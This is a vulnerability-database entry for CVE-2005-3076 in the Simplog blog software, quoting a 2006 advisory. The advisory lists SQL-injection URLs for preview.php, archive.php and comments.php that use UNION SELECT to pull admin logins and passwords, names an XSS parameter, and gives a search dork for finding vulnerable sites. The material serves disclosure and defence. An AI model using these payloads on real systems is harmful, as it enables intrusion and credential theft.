Simplog中多个SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1197759 漏洞类型 输入验证
发布时间 2005-09-27 更新时间 2006-08-11
CVE编号 CVE-2005-3076 CNNVD-ID CNNVD-200509-275
漏洞平台 N/A CVSS评分 7.5
|漏洞来源
https://cxsecurity.com/issue/WLB-2006040079
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200509-275
|漏洞详情
Simplog,能使你很容易地为现有的站点添加blog功能,它由php写成,兼容多数数据库,它的特点是强大并且简单.Simplog0.9.1可能存在安全漏洞,远程攻击者通过无效的(1)注入archive.php脚本的pid参数,(2)blogid参数,(3)cid参数,或(4)archive.php脚本的m参数或(5)blogid参数可能执行任意SQL指令,或引起SQL出错信息。
|漏洞EXP
--Security Report--
Advisory: Simplog <= 0.93 Multiple Remote Vulnerabilities.
---
Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI
---
Date: 21/04/06 22:13 PM
---
Contacts:{
ICQ: 10072
MSN/Email: nukedx (at) nukedx (dot) com [email concealed]
Web: http://www.nukedx.com
}
---
Vendor: Simplog (http://www.simplog.org/)
Version: 0.93 and prior versions must be affected.
About: Via this methods remote attacker can inject arbitrary SQL queries to 
tid parameter in preview.php,
cid,pid and eid in archive.php and pid in comments.php.As u know rgod was 
published advisory about version 0.92 but he
did not notice this SQL injections. He found other SQL injections on 
archive.php but did not found these vulnerabilities.
Also there is cross site scripting vulnerability in imagelist.php's imagedir 
parameter.
Level: Critical
---
How&Example: 
SQL Injection :
Needs MySQL > 4.0
GET -> http://[victim]/[simplogdir]/preview.php?adm=tem&blogid=1&tid=[SQL]
GET -> http://[victim]/[simplogdir]/archive.php?blogid=1&cid=[SQL]
GET -> http://[victim]/[simplogdir]/archive.php?blogid=1&pid=[SQL]
GET -> http://[victim]/[simplogdir]/archive.php?blogid=1&eid=[SQL]
EXAMPLE ->

http://[victim]/[simplogdir]/preview.php?adm=tem&blogid=1&tid=-1/**/UNIO
N/**/SELECT/**/
concat(25552,login,25553,password,25554)/**/from/**/blog_users/**/where/
**/admin=1/*
EXAMPLE ->

http://[victim]/[simplogdir]/archive.php?blogid=1&cid=-1/**/UNION/**/SEL
ECT/**/0,null,0,email,0,0,login,
password,0,admin,0/**/from/**/blog_users/**/where/**/admin=1/*
EXAMPLE ->

http://[victim]/[simplogdir]/archive.php?blogid=1&pid=-1/**/UNION/**/SEL
ECT/**/0,null,0,email,0,0,login,
password,0,admin,0/**/from/**/blog_users/**/where/**/admin=1/*
EXAMPLE ->

http://[victim]/[simplogdir]/archive.php?blogid=1&eid=-1/**/UNION/**/SEL
ECT/**/0,null,0,email,0,0,login,
password,0,admin,0/**/from/**/blog_users/**/where/**/admin=1/*
EXAMPLE ->

http://[victim]/[simplogdir]/comments.php?blogid=1&pid=-1/**/UNION/**/SE
LECT/**/0,null,0,email,0,0,login,
password,0,admin,0/**/from/**/blog_users/**/where/**/admin=1/*
with this examples remote attacker can leak speficied admins login 
information from database.

XSS:
GET ->

http://[victim]/[simplogdir]/imagelist.php?blogid=1&act=add_entry&login=
1&imagedir=[XSS]

---
Timeline:
* 21/04/2006: Vulnerability found.
* 21/04/2006: Contacted with vendor and waiting reply.
---
Exploit:
http://www.nukedx.com/?getxpl=25
---
Dorks: "powered by simplog"
---
Original advisory can be found at: http://www.nukedx.com/?viewdoc=25
|参考资料

来源:www.simplog.org
链接:http://www.simplog.org/bugs/bug.php?op=show&bugid=55
来源:BID
名称:14897
链接:http://www.securityfocus.com/bid/14897
来源:SECUNIA
名称:16881
链接:http://secunia.com/advisories/16881
来源:SREASON
名称:755
链接:http://securityreason.com/securityalert/755